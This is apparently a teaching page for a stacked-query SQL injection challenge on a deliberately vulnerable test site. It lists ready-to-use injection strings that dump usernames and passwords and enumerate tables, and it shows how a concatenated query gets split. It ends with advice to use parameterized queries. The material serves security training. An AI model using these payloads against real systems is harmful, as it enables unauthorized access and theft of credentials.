📚

Stacked Queries SQL Injection Challenge 📚

Stacked queries (also called batched queries) allow an attacker to execute multiple SQL statements in a single request by separating them with semicolons. This is one of the most dangerous types of SQL injection because it allows attackers to perform multiple operations, including:

Data extraction: Execute multiple SELECT queries to extract different data
Data modification: INSERT, UPDATE, or DELETE records
Database manipulation: CREATE, ALTER, or DROP tables
Privilege escalation: Modify user permissions or create new users

Important: Not all database systems and APIs support stacked queries. SQLite with sql.js supports them, and when vulnerable code uses string concatenation and allows semicolons, stacked queries become possible.

WARNING: In many countries (including UK) it is illegal to use this attack.

Up to 6 months in jail for unauthorised access

I've set up a vulnerable test system here so that you can have a go.

I promise not to prosecute.

The challenge on this page is to understand how stacked queries work. Try the examples below in the search box to see how multiple queries can be executed in a single request.

Try These Stacked Query Attacks:

Execute a second SELECT query:
This executes two queries separated by a semicolon: mouse'; SELECT * FROM users --

Extract usernames with a stacked query:
Get all usernames from the users table: mouse'; SELECT username FROM users --

Extract passwords with a stacked query:
Get all passwords from the users table: mouse'; SELECT password FROM users --

Extract both username and password:
Get username and password pairs: mouse'; SELECT username, password FROM users --

Get table names from information_schema:
Extract all table names: mouse'; SELECT table_name FROM information_schema_tables --

Execute multiple queries:
Execute three different queries in one request: mouse'; SELECT username FROM users; SELECT name FROM products; SELECT table_name FROM information_schema_tables --

How Stacked Queries Work

Stacked queries work by separating multiple SQL statements with semicolons:

Basic syntax: query1; query2; query3
Injection point: The semicolon ends the first query, allowing a second query to be executed
Comment out remainder: Use -- or # to comment out any remaining SQL from the original query

Example: If the original query is:

SELECT * FROM products WHERE name = '$input'

And you inject: mouse'; SELECT * FROM users --

The database executes:

SELECT * FROM products WHERE name = 'mouse';
SELECT * FROM users -- '

Both queries are executed, and you can see results from both.

Security Implications

Stacked queries are extremely dangerous because they allow:

Multiple data extraction operations in a single request
Data modification (INSERT, UPDATE, DELETE) if the database user has write permissions
Database structure changes (CREATE, ALTER, DROP) if the database user has DDL permissions
Complete database compromise if the database user has administrative privileges

Prevention: Always use parameterized queries (prepared statements) and never allow user input to be directly concatenated into SQL queries. Most prepared statement implementations prevent stacked queries by design.

📚

Product Search

Stacked Queries SQL Injection Challenge 📚

Try These Stacked Query Attacks:

How Stacked Queries Work

Security Implications